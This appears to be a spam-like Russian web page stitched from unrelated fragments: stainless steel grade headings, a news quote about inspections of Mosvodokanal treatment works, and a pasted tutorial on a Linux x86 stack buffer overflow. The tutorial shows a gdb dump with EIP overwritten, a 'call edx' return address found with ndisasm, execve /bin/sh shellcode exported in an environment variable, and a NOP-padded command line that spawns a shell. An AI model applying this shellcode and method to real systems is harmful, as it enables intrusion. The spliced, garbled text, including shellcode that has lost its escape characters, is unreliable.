марки стали

Марки нержавеющей стали

заголовок

«Вчера на объектах Мосводоканала, а именно на Курьяновских очистных сооружениях, была проверка МЧС, а сегодня их проверяет природоохранная прокуратура Москвы, проверка в настоящее время продолжается, результаты пока неизвестны», — сказал собеседник агентства.

марка стали проката
московская ассоциация гильдии риэлторов

0x41414141 in ?? () gdb> i r eax            0x1      0x1 ecx            0xffffe21d       0xffffe21d edx            0xbfa0b71b       0xbfa0b71b ebx            0xb7ee6ff4       0xb7ee6ff4 esp            0xbfa08630       0xbfa08630 ebp            0x41414141       0x41414141 esi            0xb7f0dc80       0xb7f0dc80 edi            0xbfa08674       0xbfa08674 eip            0x41414141       0x41414141 eflags         0x10246  0x10246 cs             0x73     0x73 ss             0x7b     0x7b ds             0x7b     0x7b es             0x7b     0x7b fs             0x0      0x0 gs             0x0      0x0 при более подробном изучении мы можем обнаружить адрес рандомизации указателя окружения в edx, который всегда указывает на наши переменные окружения в уязвимом примере, что часто случается в случае переполнения параметра командной строки. gdb> x/s $edx 0xbfa0b71b:      "manpath=", чтобы проэксплуатировать эту программу, мы должны найти путь для вызова "call $edx", "jmp $edx" или sh $edx, retn". мы можем найти необходимый адрес возврата в статической области памяти из elf файла, используя ndisasm и grep. prdelka@gentoo ~ $ ./ndisasm bug | grep "call dx" 00000338  ffd2              call dx 000016f3  ffd2              call dx в результате мы знаем, что основной адрес elf файла - 08048000, если мы добавим 0x338 оффсет, мы получим адрес возврата 0x8048338! если мы исследуем этот адрес возврата в gdb, то увидим следующее: 0x8048338 :   call   *%edx эксплуатация чтобы эксплуатировать ошибку, мы поместим наши данные в первую переменную окружения. чтобы найти их, запустим команду `env`: prdelka@gentoo ~ $ env manpath=/usr/local/share/man:/usr/share/man:/usr/share/binutils-data/i686-pc-linux-gnu/2.15.92.0.2 /man:/usr/share/gcc-data/i686-pc-linux-gnu/3.3.6/man:/usr/qt/3/doc/man теперь добавим наш шелкод в эту переменную окружения: prdelka@gentoo ~ $ export manpath=`perl -e           `print "x90x90x90x90x90x90x90x90x90x90x90x31xc0x50x68"; print "//sh";print "x68"; print "/bin";print "x89xe3x50x53x89xe1x99xb0x0bxcdx80";`` теперь мы можем проэксплуатировать нашу программу, используя ранее найденный адрес возврата: prdelka@gentoo ~ $ uname -a linux gentoo 2.6.12-gentoo-r10 2 tue sep 13 00:33:15 idt 2005 i686                     mobile intel(r) celeron(r) cpu 1.70ghz genuineintel gnu/linux prdelka@gentoo ~ $ ./bug `perl -e `print "x90"x124;print "x38x83x04x08";`` sh-3.















%